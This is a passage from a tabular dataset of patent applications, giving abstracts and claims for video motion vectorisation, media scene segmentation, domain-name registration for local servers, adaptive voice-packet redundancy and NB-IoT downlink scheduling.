data extraction and vectorization system of claim 12 configured as one or more of an integrated chip and a computer system comprising at least one processor configured to execute computer program instructions for said extraction and said vectorization of said motion data of said detected object in motion with said optimized data storage and said data transmission bandwidth. 30. A computer program product comprising a non-transitory computer readable storage medium, said non-transitory computer readable storage medium storing computer program codes that comprise instructions executable by a motion data processor, said computer program codes comprising:
a first computer program code for detecting an object in motion from consecutive image frames of video data received from an image sensor; a second computer program code for extracting motion data of said detected object in motion from each of a series of image frames of said received video data, wherein said motion data comprises image data associated with said object in motion, trajectory data of motion of said object in motion, relative physical dimensions of said object, a type of said object, spatial coordinates of said object in said each of said image frames, sequence data of said image frames, and time stamp data of said each of said image frames; and a third computer program code for generating a matrix of vectors configured to define said object in motion for said each of said image frames using said extracted motion data. 31. The computer program product of claim 30, wherein said first computer program code further comprises:
a fourth computer program code for comparing said consecutive said image frames with each other for detecting said object in motion, while excluding a background of said object in motion; and a fifth computer program code for comparing said detected object in motion with one or more object libraries for confirming said detection of said object in motion. 32. The computer program product of claim 30, wherein said second computer program code further comprises:
a sixth computer program code for dynamically selecting one or more of a plurality of predefined data extraction algorithms and an object library based on matching of said extracted motion data with selection criteria; and a seventh computer program code for extracting said motion data of subsequent said image frames using said dynamically selected one or more of said predefined data extraction algorithms and said object library. | 2,400 |
9,167 | 9,167 | 15,199,677 | 2,484 | There is provided a system including a non-transitory memory storing an executable code and a hardware processor executing the executable code to receive a media content including a plurality of frames, divide the media content into a plurality of shots, each of the plurality of shots including a plurality of frames of the media content based on a first similarity between the plurality of frames, determine a plurality of sequential shots of the plurality of shots to be part of a first sub-scene of a plurality of sub-scenes of a scene based on a timeline continuity of the plurality of sequential shots, identify each of the plurality of shots of the media content and each of the plurality of sub-scenes with a corresponding beginning time code and a corresponding ending time code. | 1. A system comprising:
a non-transitory memory storing an executable code; a hardware processor executing the executable code to:
receive a media content including a plurality of frames;
divide the media content into a plurality of shots, each of the plurality of shots including a plurality of frames of the media content based on a first similarity between the plurality of frames;
determine a plurality of sequential shots of the plurality of shots to be part of a first sub-scene of a plurality of sub-scenes of a scene based on a timeline continuity of the plurality of sequential shots;
identify each of the plurality of shots of the media content and each of the plurality of sub-scenes with a corresponding beginning time code and a corresponding ending time code. 2. The system of claim 1, wherein the hardware processor further executes the executable code to:
determine one or more sequential sub-scenes of the plurality of sub-scenes to be part of the scene; and identify the scene with a corresponding beginning time code and a corresponding ending time code. 3. The system of claim 1, wherein the hardware processor further executes the executable code to:
receive a user input annotating at least one of a shot, a sub-scene, and a scene. 4. The system of claim 3, wherein the hardware processor further executes the executable code to:
store the user input in an annotation database in the non-transitory memory. 5. The system of claim 1, wherein the hardware processor further executes the executable code to:
transmit one or more of the plurality of shots for display on a display. 6. The system of claim 5, wherein the hardware processor further executes the executable code to:
transmit a supplemental content related to the plurality of shots for display on the display concurrent with the display of the plurality of shots. 7. The system of claim 1, wherein the first similarity between the plurality of frames of the media content is one of a same character, a same setting, and a same theme. 8. The system of claim 1, wherein the first similarity is determined using one of an edit decision list, a metadata content, and computer vision. 9. The system of claim 1, wherein the plurality of sub-scenes in the scene provide context to at least one of a preceding sub-scene of the scene and a succeeding sub-scene of the scene. 10. The system of claim 1, wherein each scene includes at least one connecting element. 11. A method for use with a system comprising a non-transitory memory and a hardware processor, the method comprising:
receiving, using the hardware processor, a media content; dividing, using the hardware processor, the media content into a plurality of shots, each of the plurality of shots including a plurality of frames of the media content based on a first similarity between the plurality of frames; determining, using the hardware processor, a plurality of sequential shots of the plurality of shots to be part of a first sub-scene of a plurality of sub-scenes of a scene based on a timeline continuity of the plurality of sequential shots; and identifying, using the hardware processor, each of the plurality of shots of the media content and each of the plurality of sub-scenes with a corresponding beginning time code and a corresponding ending time code. 12. The method of claim 11, further comprising:
determining, using the hardware processor, one or more sequential sub-scenes of the plurality of sub-scenes to be part of the scene; and identifying, using the hardware processor, the scene with a corresponding beginning time code and a corresponding ending time code. 13. The method of claim 11, further comprising:
receiving, using the hardware processor, a user input annotating at least one of a shot, a sub-scene, and a scene. 14. The method of claim 15, further comprising:
storing the user input in an annotation database in the non-transitory memory. 15. The method of claim 11, further comprising:
transmitting, using the hardware processor, one or more of the plurality of shots for display on a display. 16. The method of claim 11, further comprising:
transmitting, using the hardware processor, a supplemental content related to the plurality of shots for display on the display concurrent with the display of the plurality of shots. 17. The method of claim 11, wherein the first similarity between the plurality of frames of the media content is one of a same character, a same setting, and a same theme. 18. The method of claim 11, wherein the first similarity is determined using one of an edit decision list, a metadata content, and computer vision. 19. The method of claim 11, wherein the plurality of sub-scenes in the scene provide context to at least one of a preceding sub-scene of the scene and a succeeding sub-scene of the scene. 20. The method of claim 11, wherein each scene includes at least one connecting element. | There is provided a system including a non-transitory memory storing an executable code and a hardware processor executing the executable code to receive a media content including a plurality of frames, divide the media content into a plurality of shots, each of the plurality of shots including a plurality of frames of the media content based on a first similarity between the plurality of frames, determine a plurality of sequential shots of the plurality of shots to be part of a first sub-scene of a plurality of sub-scenes of a scene based on a timeline continuity of the plurality of sequential shots, identify each of the plurality of shots of the media content and each of the plurality of sub-scenes with a corresponding beginning time code and a corresponding ending time code.1. A system comprising:
a non-transitory memory storing an executable code; a hardware processor executing the executable code to:
receive a media content including a plurality of frames;
divide the media content into a plurality of shots, each of the plurality of shots including a plurality of frames of the media content based on a first similarity between the plurality of frames;
determine a plurality of sequential shots of the plurality of shots to be part of a first sub-scene of a plurality of sub-scenes of a scene based on a timeline continuity of the plurality of sequential shots;
identify each of the plurality of shots of the media content and each of the plurality of sub-scenes with a corresponding beginning time code and a corresponding ending time code. 2. The system of claim 1, wherein the hardware processor further executes the executable code to:
determine one or more sequential sub-scenes of the plurality of sub-scenes to be part of the scene; and identify the scene with a corresponding beginning time code and a corresponding ending time code. 3. The system of claim 1, wherein the hardware processor further executes the executable code to:
receive a user input annotating at least one of a shot, a sub-scene, and a scene. 4. The system of claim 3, wherein the hardware processor further executes the executable code to:
store the user input in an annotation database in the non-transitory memory. 5. The system of claim 1, wherein the hardware processor further executes the executable code to:
transmit one or more of the plurality of shots for display on a display. 6. The system of claim 5, wherein the hardware processor further executes the executable code to:
transmit a supplemental content related to the plurality of shots for display on the display concurrent with the display of the plurality of shots. 7. The system of claim 1, wherein the first similarity between the plurality of frames of the media content is one of a same character, a same setting, and a same theme. 8. The system of claim 1, wherein the first similarity is determined using one of an edit decision list, a metadata content, and computer vision. 9. The system of claim 1, wherein the plurality of sub-scenes in the scene provide context to at least one of a preceding sub-scene of the scene and a succeeding sub-scene of the scene. 10. The system of claim 1, wherein each scene includes at least one connecting element. 11. A method for use with a system comprising a non-transitory memory and a hardware processor, the method comprising:
receiving, using the hardware processor, a media content; dividing, using the hardware processor, the media content into a plurality of shots, each of the plurality of shots including a plurality of frames of the media content based on a first similarity between the plurality of frames; determining, using the hardware processor, a plurality of sequential shots of the plurality of shots to be part of a first sub-scene of a plurality of sub-scenes of a scene based on a timeline continuity of the plurality of sequential shots; and identifying, using the hardware processor, each of the plurality of shots of the media content and each of the plurality of sub-scenes with a corresponding beginning time code and a corresponding ending time code. 12. The method of claim 11, further comprising:
determining, using the hardware processor, one or more sequential sub-scenes of the plurality of sub-scenes to be part of the scene; and identifying, using the hardware processor, the scene with a corresponding beginning time code and a corresponding ending time code. 13. The method of claim 11, further comprising:
receiving, using the hardware processor, a user input annotating at least one of a shot, a sub-scene, and a scene. 14. The method of claim 15, further comprising:
storing the user input in an annotation database in the non-transitory memory. 15. The method of claim 11, further comprising:
transmitting, using the hardware processor, one or more of the plurality of shots for display on a display. 16. The method of claim 11, further comprising:
transmitting, using the hardware processor, a supplemental content related to the plurality of shots for display on the display concurrent with the display of the plurality of shots. 17. The method of claim 11, wherein the first similarity between the plurality of frames of the media content is one of a same character, a same setting, and a same theme. 18. The method of claim 11, wherein the first similarity is determined using one of an edit decision list, a metadata content, and computer vision. 19. The method of claim 11, wherein the plurality of sub-scenes in the scene provide context to at least one of a preceding sub-scene of the scene and a succeeding sub-scene of the scene. 20. The method of claim 11, wherein each scene includes at least one connecting element. | 2,400 |
9,168 | 9,168 | 16,589,002 | 2,491 | A method for establishing communication includes receiving a request to establish communication with a server, the request including an internet protocol address of the server, forming a unique domain name comprising a unique part and a general part, and associating the unique domain name with the internet protocol address. The method further includes storing the unique domain name in association with the internet protocol address on a domain name server, and establishing a communication between a user device and the server by resolving the unique domain name. | 1. A method for establishing communication in a network supporting a plurality of user devices and servers, the method comprising:
receiving, by a second server via an interface, a request to register a first server, the request including a unique name of the first server and an internet protocol address of the first server; forming, by the second server, a unique domain name for the first server based on the unique name of the first server; associating, by the second server, the unique domain name with the internet protocol address; providing, by the second server, the unique domain name to the first server; and providing, by the second server, the unique domain name in association with the internet protocol address to a domain name server. 2. The method of claim 1, wherein the unique domain name comprises the unique name of the first server and a general part, the unique name corresponds to a subdomain part of the unique domain name, and the general part corresponds to a domain part of the unique domain name. 3. The method of claim 2, further comprising obtaining, by the second server, a certificate from a certification authority, wherein the certificate is obtained for any unique domain name that includes the general part. 4. The method of claim 3, further comprising providing, by the second server, the certificate to the first server. 5. (canceled) 6. The method of claim 1, wherein the first server is communicating with the user device over a local area network. 7. The method of claim 1, wherein the communication between the user device and the first server is facilitated by web browsers. 8. The method of claim 1, wherein a websocket protocol is used for full-duplex communication between the user device and the first server. 9. The method of claim 1, wherein the first server blocks all inbound and outbound communications with devices outside a local area network, apart from communications with the domain name server. 10. The method of claim 1, wherein the request is received by a third party. 11. A system for facilitating communications between a client device and a first server, comprising:
a second server communicatively connected with the first server and a domain name server, wherein the second server includes at least one processor for executing operations comprising: receiving, via an interface, a request to register the first server, the request including a unique name of the first server and an internet protocol address of the first server; forming a unique domain name for the first server based on the unique name of the first server; associating the unique domain name with the internet protocol address; providing the unique domain name to the first server; and providing the unique domain name in association with the internet protocol address to the domain name server. 12. The system of claim 11, wherein the unique domain name comprises the unique name of the first server and a general part, the unique name corresponds to a subdomain part of the unique domain name, and the general part corresponds to a domain part of the unique domain name. 13. The system of claim 12, wherein the at least one processor further executes operations comprising obtaining a certificate from a certification authority, wherein the certificate is obtained for any unique domain name that includes the general part. 14. The system of claim 13, wherein the at least one processor further executes operations comprising providing the certificate to the server. 15. (canceled) 16. A non-transitory computer readable medium including instructions that, when executed by at least one processor of a second server, cause the at least one processor to perform operations comprising:
receiving, via an interface, a request to register a first server, the request including a unique name of the first server and an internet protocol address of the first server; forming a unique domain name for the first server based on the unique name of the first server; associating the unique domain name with the internet protocol address; providing the unique domain name to the first server; and providing the unique domain name in association with the internet protocol address to a domain name server. 17. The non-transitory computer readable medium of claim 16, wherein the unique domain name comprises the unique name of the first server and a general part, the unique name corresponds to a subdomain part of the unique domain name, and the general part corresponds to a domain part of the unique domain name. 18. The non-transitory computer readable medium of claim 17, wherein the operations further comprising obtaining a certificate from a certification authority, wherein the certificate is obtained for any unique domain name that includes the general part. 19. The non-transitory computer readable medium of claim 18, wherein the operations further comprising providing the certificate to the first server. 20. The non-transitory computer readable medium of claim 16, wherein the first server blocks all inbound and outbound communications with devices outside a local area network, apart from communications with the domain name server. | A method for establishing communication includes receiving a request to establish communication with a server, the request including an internet protocol address of the server, forming a unique domain name comprising a unique part and a general part, and associating the unique domain name with the internet protocol address. The method further includes storing the unique domain name in association with the internet protocol address on a domain name server, and establishing a communication between a user device and the server by resolving the unique domain name.1. A method for establishing communication in a network supporting a plurality of user devices and servers, the method comprising:
receiving, by a second server via an interface, a request to register a first server, the request including a unique name of the first server and an internet protocol address of the first server; forming, by the second server, a unique domain name for the first server based on the unique name of the first server; associating, by the second server, the unique domain name with the internet protocol address; providing, by the second server, the unique domain name to the first server; and providing, by the second server, the unique domain name in association with the internet protocol address to a domain name server. 2. The method of claim 1, wherein the unique domain name comprises the unique name of the first server and a general part, the unique name corresponds to a subdomain part of the unique domain name, and the general part corresponds to a domain part of the unique domain name. 3. The method of claim 2, further comprising obtaining, by the second server, a certificate from a certification authority, wherein the certificate is obtained for any unique domain name that includes the general part. 4. The method of claim 3, further comprising providing, by the second server, the certificate to the first server. 5. (canceled) 6. The method of claim 1, wherein the first server is communicating with the user device over a local area network. 7. The method of claim 1, wherein the communication between the user device and the first server is facilitated by web browsers. 8. The method of claim 1, wherein a websocket protocol is used for full-duplex communication between the user device and the first server. 9. The method of claim 1, wherein the first server blocks all inbound and outbound communications with devices outside a local area network, apart from communications with the domain name server. 10. The method of claim 1, wherein the request is received by a third party. 11. A system for facilitating communications between a client device and a first server, comprising:
a second server communicatively connected with the first server and a domain name server, wherein the second server includes at least one processor for executing operations comprising: receiving, via an interface, a request to register the first server, the request including a unique name of the first server and an internet protocol address of the first server; forming a unique domain name for the first server based on the unique name of the first server; associating the unique domain name with the internet protocol address; providing the unique domain name to the first server; and providing the unique domain name in association with the internet protocol address to the domain name server. 12. The system of claim 11, wherein the unique domain name comprises the unique name of the first server and a general part, the unique name corresponds to a subdomain part of the unique domain name, and the general part corresponds to a domain part of the unique domain name. 13. The system of claim 12, wherein the at least one processor further executes operations comprising obtaining a certificate from a certification authority, wherein the certificate is obtained for any unique domain name that includes the general part. 14. The system of claim 13, wherein the at least one processor further executes operations comprising providing the certificate to the server. 15. (canceled) 16. A non-transitory computer readable medium including instructions that, when executed by at least one processor of a second server, cause the at least one processor to perform operations comprising:
receiving, via an interface, a request to register a first server, the request including a unique name of the first server and an internet protocol address of the first server; forming a unique domain name for the first server based on the unique name of the first server; associating the unique domain name with the internet protocol address; providing the unique domain name to the first server; and providing the unique domain name in association with the internet protocol address to a domain name server. 17. The non-transitory computer readable medium of claim 16, wherein the unique domain name comprises the unique name of the first server and a general part, the unique name corresponds to a subdomain part of the unique domain name, and the general part corresponds to a domain part of the unique domain name. 18. The non-transitory computer readable medium of claim 17, wherein the operations further comprising obtaining a certificate from a certification authority, wherein the certificate is obtained for any unique domain name that includes the general part. 19. The non-transitory computer readable medium of claim 18, wherein the operations further comprising providing the certificate to the first server. 20. The non-transitory computer readable medium of claim 16, wherein the first server blocks all inbound and outbound communications with devices outside a local area network, apart from communications with the domain name server. | 2,400 |
9,169 | 9,169 | 14,485,482 | 2,465 | Voice data transmission with adaptive redundancy creates a voice data packet by packetizing the voice data payload and a number of redundant payloads selected from a set of previous voice data payloads. The voice data from the voice data payload is analysed to determine whether it is a critical or non-critical payload by classifying the received voice data as voiced or unvoiced. If at least a portion of the voice data is classified as unvoiced, the voice data payload is determined to be a critical payload. If it is a critical payload, then the voice data payload is added to the set of previous voice data payloads for inclusion as a redundant payload in subsequent voice data packets. The voice data packet is then forwarded for transmission over the network. | 1. A method for transmitting voice data packets with redundancy in a network, the method comprising:
receiving voice data and encoding the voice data as a voice data payload; packetizing the voice data payload to generate a voice data packet including the voice data payload, the voice data packet further including at least one redundant payload selected from a set of previous voice data payloads; determining whether the encoded voice data payload is a critical payload or non-critical payload by classifying the received voice data as voiced or unvoiced, wherein, if at least a portion of the voice data is classified as unvoiced, the encoded voice data payload is determined to be a critical payload; adding the encoded voice data payload to the set of previous voice data payloads for inclusion as a redundant payload in subsequent voice data packets if the encoded voice data payload is determined to be a critical payload; and forwarding the voice data packet for transmission over the network. 2. The method of claim 1, further comprising: receiving a network statistics report and estimating a redundancy value based on the network statistics report, and wherein the number of redundant payloads is based on the redundancy value. 3. The method of claim 1, wherein, if the voice data is classified as voiced, the determining further comprises calculating a waveform similarity factor for the received voice data. 4. The method of claim 3, wherein calculating the waveform similarity factor comprises deriving a pitch for the voice data. 5. The method of claim 3, wherein calculating the waveform similarity factor comprises setting the waveform similarity factor to zero if the voice data is determined to be noise. 6. The method of claim 3, wherein, if the voice data is classified as voiced, the determining further comprises: calculating a variance value using the waveform similarity factor and comparing the variance value to a threshold value to determine whether the voice data payload is a critical payload. 7. The method of claim 1, wherein, if the voice data payload is determined to be a non-critical payload, then the voice data payload is not added to the set of previous voice data payloads. 8. The method of claim 1, wherein the packetizing further comprises determining that one or more preceding voice data payloads were selectively dropped prior to transmission over the network, and adding one or more of the dropped preceding voice data payloads to the voice data packet. 9. The method of claim 1, further comprising, subsequent to forwarding the voice data packet: determining whether to drop the voice data payload without transmitting it over the network. 10. The method claim 2, wherein the network statistics report comprises at least one of: out-of-order packet statistics for packets previously sent for transmission over the network; and lost packet statistics for packets previously sent for transmission over the network. 11. A system for transmitting voice data packets with redundancy in a network, the system comprising:
an encoder configured to receive voice data and generate an encoded voice data payload from the voice data; a packetizer configured to packetize the encoded voice data payload to generate a voice data packet including the encoded voice data payload, the voice data packet further comprising at least one redundant payload selected from a set of previous voice data payloads; a packet identifier configured to determine whether the encoded voice data payload is a critical payload or non-critical payload by classifying the received voice data as voiced or unvoiced, wherein, if at least a portion of the voice data is classified as unvoiced, the encoded voice data payload is determined to be a critical payload, and, if the voice data payload is determined to be a critical payload, then the encoded voice data payload is added to the set of previous voice data payloads for inclusion as a redundant payload in subsequent voice data packets; and a transmitter configured to forward the voice data packet for transmission over the network. 12. The system of claim 11, further comprising: a network report receiver configured to receive a network statistics report; and a redundancy estimator configured to estimate a redundancy value based on the network statistics report, wherein the number of redundant payloads is based on the redundancy value. 13. The system of claim 11, wherein, if the voice data is classified as voiced, the packet identifier is configured to calculate a waveform similarity factor for the received voice data. 14. The system of claim 13, wherein the packet identifier calculates the waveform similarity factor based on a pitch of the voice data, and sets the waveform similarity factor to zero if the voice data is determined to be noise. 15. The system of claim 13, wherein, if the voice data is classified as voiced, the packet identifier is configured to calculate a variance value using the waveform similarity factor and compare the variance value to a threshold value to determine whether the voice data payload is a critical payload. 16. The system of claim 11, wherein, if the voice data payload is determined to be a non-critical payload, then the voice data payload is not added to the set of previous voice data payloads. 17. The system of claim 11, wherein the packetizer is further configured to determine that one or more preceding voice data payloads were selectively dropped prior to transmission over the network, and add one or more of the dropped preceding voice data payloads to the voice data packet. 18. The system of claim 11, wherein the transmitter is further configured to determine whether to drop the voice data payload, subsequent to forwarding the voice data packet. 19. The system of claim 11, wherein the network statistics report comprises at least one of: out-of-order packet statistics for packets previously sent by the transmitter; and lost packet statistics for packets previously sent by the transmitter. 20. A non-transitory computer readable storage medium having stored therein computer-executable instructions that cause a computer to:
receive voice data and encode the voice data as a voice data payload; packetize the voice data payload to generate a voice data packet including the voice data payload, the voice data packet further including at least one redundant payload selected from a set of previous voice data payloads; determine whether the voice data payload is a critical payload or non-critical payload by classifying the received voice data as voiced or unvoiced, wherein, if at least a portion of the voice data is classified as unvoiced, the voice data payload is determined to be a critical payload; add the voice data payload to the set of previous voice data payloads for inclusion as the redundant payload in subsequent voice data packets if the voice data payload is determined to be a critical payload; and forward the voice data packet for transmission over the network. | Voice data transmission with adaptive redundancy creates a voice data packet by packetizing the voice data payload and a number of redundant payloads selected from a set of previous voice data payloads. The voice data from the voice data payload is analysed to determine whether it is a critical or non-critical payload by classifying the received voice data as voiced or unvoiced. If at least a portion of the voice data is classified as unvoiced, the voice data payload is determined to be a critical payload. If it is a critical payload, then the voice data payload is added to the set of previous voice data payloads for inclusion as a redundant payload in subsequent voice data packets. The voice data packet is then forwarded for transmission over the network.1. A method for transmitting voice data packets with redundancy in a network, the method comprising:
receiving voice data and encoding the voice data as a voice data payload; packetizing the voice data payload to generate a voice data packet including the voice data payload, the voice data packet further including at least one redundant payload selected from a set of previous voice data payloads; determining whether the encoded voice data payload is a critical payload or non-critical payload by classifying the received voice data as voiced or unvoiced, wherein, if at least a portion of the voice data is classified as unvoiced, the encoded voice data payload is determined to be a critical payload; adding the encoded voice data payload to the set of previous voice data payloads for inclusion as a redundant payload in subsequent voice data packets if the encoded voice data payload is determined to be a critical payload; and forwarding the voice data packet for transmission over the network. 2. The method of claim 1, further comprising: receiving a network statistics report and estimating a redundancy value based on the network statistics report, and wherein the number of redundant payloads is based on the redundancy value. 3. The method of claim 1, wherein, if the voice data is classified as voiced, the determining further comprises calculating a waveform similarity factor for the received voice data. 4. The method of claim 3, wherein calculating the waveform similarity factor comprises deriving a pitch for the voice data. 5. The method of claim 3, wherein calculating the waveform similarity factor comprises setting the waveform similarity factor to zero if the voice data is determined to be noise. 6. The method of claim 3, wherein, if the voice data is classified as voiced, the determining further comprises: calculating a variance value using the waveform similarity factor and comparing the variance value to a threshold value to determine whether the voice data payload is a critical payload. 7. The method of claim 1, wherein, if the voice data payload is determined to be a non-critical payload, then the voice data payload is not added to the set of previous voice data payloads. 8. The method of claim 1, wherein the packetizing further comprises determining that one or more preceding voice data payloads were selectively dropped prior to transmission over the network, and adding one or more of the dropped preceding voice data payloads to the voice data packet. 9. The method of claim 1, further comprising, subsequent to forwarding the voice data packet: determining whether to drop the voice data payload without transmitting it over the network. 10. The method claim 2, wherein the network statistics report comprises at least one of: out-of-order packet statistics for packets previously sent for transmission over the network; and lost packet statistics for packets previously sent for transmission over the network. 11. A system for transmitting voice data packets with redundancy in a network, the system comprising:
an encoder configured to receive voice data and generate an encoded voice data payload from the voice data; a packetizer configured to packetize the encoded voice data payload to generate a voice data packet including the encoded voice data payload, the voice data packet further comprising at least one redundant payload selected from a set of previous voice data payloads; a packet identifier configured to determine whether the encoded voice data payload is a critical payload or non-critical payload by classifying the received voice data as voiced or unvoiced, wherein, if at least a portion of the voice data is classified as unvoiced, the encoded voice data payload is determined to be a critical payload, and, if the voice data payload is determined to be a critical payload, then the encoded voice data payload is added to the set of previous voice data payloads for inclusion as a redundant payload in subsequent voice data packets; and a transmitter configured to forward the voice data packet for transmission over the network. 12. The system of claim 11, further comprising: a network report receiver configured to receive a network statistics report; and a redundancy estimator configured to estimate a redundancy value based on the network statistics report, wherein the number of redundant payloads is based on the redundancy value. 13. The system of claim 11, wherein, if the voice data is classified as voiced, the packet identifier is configured to calculate a waveform similarity factor for the received voice data. 14. The system of claim 13, wherein the packet identifier calculates the waveform similarity factor based on a pitch of the voice data, and sets the waveform similarity factor to zero if the voice data is determined to be noise. 15. The system of claim 13, wherein, if the voice data is classified as voiced, the packet identifier is configured to calculate a variance value using the waveform similarity factor and compare the variance value to a threshold value to determine whether the voice data payload is a critical payload. 16. The system of claim 11, wherein, if the voice data payload is determined to be a non-critical payload, then the voice data payload is not added to the set of previous voice data payloads. 17. The system of claim 11, wherein the packetizer is further configured to determine that one or more preceding voice data payloads were selectively dropped prior to transmission over the network, and add one or more of the dropped preceding voice data payloads to the voice data packet. 18. The system of claim 11, wherein the transmitter is further configured to determine whether to drop the voice data payload, subsequent to forwarding the voice data packet. 19. The system of claim 11, wherein the network statistics report comprises at least one of: out-of-order packet statistics for packets previously sent by the transmitter; and lost packet statistics for packets previously sent by the transmitter. 20. A non-transitory computer readable storage medium having stored therein computer-executable instructions that cause a computer to:
receive voice data and encode the voice data as a voice data payload; packetize the voice data payload to generate a voice data packet including the voice data payload, the voice data packet further including at least one redundant payload selected from a set of previous voice data payloads; determine whether the voice data payload is a critical payload or non-critical payload by classifying the received voice data as voiced or unvoiced, wherein, if at least a portion of the voice data is classified as unvoiced, the voice data payload is determined to be a critical payload; add the voice data payload to the set of previous voice data payloads for inclusion as the redundant payload in subsequent voice data packets if the voice data payload is determined to be a critical payload; and forward the voice data packet for transmission over the network. | 2,400 |
9,170 | 9,170 | 16,275,866 | 2,467 | A method in a network node includes communicating, over a narrowband Internet of Things downlink, a first message to a first wireless device during repetition periods of at least a first time frame and a second time frame of a plurality of time frames of a transmission time of a narrowband physical downlink control channel (NB-PDCCH) or a narrowband physical downlink shared channel (NB-PDSCH). Each time frame of the plurality of time frames includes a repetition period and a gap. The method also includes communicating a second message to a second wireless device during a gap of the first time frame. | 1. A method in a network node comprising:
communicating, over a narrowband Internet of Things downlink, a first message to a first wireless device during repetition periods of at least a first time frame and a second time frame of a plurality of time frames of a transmission time of a narrowband physical downlink control channel (NB-PDCCH) or a narrowband physical downlink shared channel (NB-PDSCH), each time frame of the plurality of time frames comprising a repetition period and a gap; and communicating a second message to a second wireless device during a gap of the first time frame. 2. The method of claim 1, further comprising communicating a third message to a third wireless device during a gap of the second time frame. 3. The method of claim 2, further comprising:
communicating a fourth message to a fourth wireless device during a second repetition period of the first time frame; and communicating, the fourth, message to the fourth wireless device during a second repetition period of the second time frame. 4. The method of claim 1, further comprising communicating a third message to a third device the repetition period of the first time frame. 5. The method of claim 1, further comprising communicating a third message to a third wireless device during the gap of the first time frame. 6. The method of claim 5, wherein:
the repetition period of the first time frame comprises a first period and a second period, the first period is longer than the second period; the first message is communicated during the first period; and the third message is communicated during the second period. 7. The method of claim 5, further comprising communicating a fourth message to a fourth wireless device during the repetition period of the first time fame. 8. The method of claim 7, wherein:
the repetition period of the first time frame of the first time frame comprises a first period a second period, and a third period the first period is longer than the second the second period is longer than the third period; the first message is communicated during the first period; the third message is communicated during the second period; and the fourth message is communicated during the third period. 9. The method of claim 1, wherein the method is performed at an eNodeB. 10. The method of claim 1, further comprising assigning the first wireless device to a coverage level based on a number of repeated transmissions communicated before an acknowledgment is received from the first wireless device. 11. The method of claim 1, wherein a number of repeated transmissions to reach the first wireless device is greater that a number of repeated transmissions to reach the second wireless device. 12. A network node comprising:
a memory; and processing circuitry communicatively coupled to the memory, the processing circuitry configured to: communicate, over a narrowband Internet of Things downlink, a first message to a first wireless device during repetition periods of at least a first time frame and a second time frame of a plurality of time frames of a transmission time of a narrowband physical downlink control channel (NB-PDCCH) or a narrowband physical downlink shared channel (NB-PDSCH). each time frame of the plurality of time frames comprising a repetition period and a gap; and communicate a second message to a second wireless device during a gap of the first time frame. 13-22. (canceled) 23. A wireless device comprising:
a memory; and processing circuitry communicatively coupled to the memory, the processing circuitry configured to: receive, over a narrowband Internet of Things downlink, a configuration indicating a subframe in which a communication over a narrowband physical downlink control channel (NB-PDCCH) is scheduled to be communicated; receive the communication over the NB-PDCCH in the subframe Indicated by the configuration; and decode the communication. 24. The wireless device -of claim 23, wherein the processing circuitry is further configured to receive a message during a repetition period of a first time frame of a plurality of time frames of a transmission time of a narrowband physical downlink control, channel (NB-PDCCH) or the NB-PDSCH, each time frame of the plurality of time frames comprising a repetition period and a gap. 25. The wireless device of claim 24, wherein at least a time frame of the plurality of time frames is aligned with the subframe. 26. The wireless device of claim 24, wherein the processing circuitry is further configured to receive a message during a gap of a first time frame of a plurality of time frames of a transmission time of a narrowband physical downlink control channel (NB-PDCCH) or a narrowband physical downlink shared channel (NB-PDSCH), each time frame of the plurality of time frames comprising a repetition period and a gap. 27. The wireless device of claim 23, wherein the configuration is communicated by an eNodeB. 28. The wireless device of claim 23, wherein the wireless device assigned to a coverage level based on a number of repeated transmissions communicated before the wireless device communicates an acknowledgment. 29. The wireless device of claim 23, wherein a number of repeated transmissions to reach the wireless device is greater than a number of repeated transmissions to reach a second wireless device assigned to a different coverage level than the wireless device. 30. A method comprising:
receiving, over a narrowband Internet of Things downlink, a configuration indicating a subframe in which a communication over a narrowband physical downlink control channel (NB-PDCCH) is scheduled to be communicated; receiving communication over the NB-PDCCH in the subframe indicated by the configuration; and decoding the communication. 31-36. (canceled) | A method in a network node includes communicating, over a narrowband Internet of Things downlink, a first message to a first wireless device during repetition periods of at least a first time frame and a second time frame of a plurality of time frames of a transmission time of a narrowband physical downlink control channel (NB-PDCCH) or a narrowband physical downlink shared channel (NB-PDSCH). Each time frame of the plurality of time frames includes a repetition period and a gap. The method also includes communicating a second message to a second wireless device during a gap of the first time frame.1. A method in a network node comprising:
communicating, over a narrowband Internet of Things downlink, a first message to a first wireless device during repetition periods of at least a first time frame and a second time frame of a plurality of time frames of a transmission time of a narrowband physical downlink control channel (NB-PDCCH) or a narrowband physical downlink shared channel (NB-PDSCH), each time frame of the plurality of time frames comprising a repetition period and a gap; and communicating a second message to a second wireless device during a gap of the first time frame. 2. The method of claim 1, further comprising communicating a third message to a third wireless device during a gap of the second time frame. 3. The method of claim 2, further comprising:
communicating a fourth message to a fourth wireless device during a second repetition period of the first time frame; and communicating, the fourth, message to the fourth wireless device during a second repetition period of the second time frame. 4. The method of claim 1, further comprising communicating a third message to a third device the repetition period of the first time frame. 5. The method of claim 1, further comprising communicating a third message to a third wireless device during the gap of the first time frame. 6. The method of claim 5, wherein:
the repetition period of the first time frame comprises a first period and a second period, the first period is longer than the second period; the first message is communicated during the first period; and the third message is communicated during the second period. 7. The method of claim 5, further comprising communicating a fourth message to a fourth wireless device during the repetition period of the first time fame. 8. The method of claim 7, wherein:
the repetition period of the first time frame of the first time frame comprises a first period a second period, and a third period the first period is longer than the second the second period is longer than the third period; the first message is communicated during the first period; the third message is communicated during the second period; and the fourth message is communicated during the third period. 9. The method of claim 1, wherein the method is performed at an eNodeB. 10. The method of claim 1, further comprising assigning the first wireless device to a coverage level based on a number of repeated transmissions communicated before an acknowledgment is received from the first wireless device. 11. The method of claim 1, wherein a number of repeated transmissions to reach the first wireless device is greater that a number of repeated transmissions to reach the second wireless device. 12. A network node comprising:
a memory; and processing circuitry communicatively coupled to the memory, the processing circuitry configured to: communicate, over a narrowband Internet of Things downlink, a first message to a first wireless device during repetition periods of at least a first time frame and a second time frame of a plurality of time frames of a transmission time of a narrowband physical downlink control channel (NB-PDCCH) or a narrowband physical downlink shared channel (NB-PDSCH). each time frame of the plurality of time frames comprising a repetition period and a gap; and communicate a second message to a second wireless device during a gap of the first time frame. 13-22. (canceled) 23. A wireless device comprising:
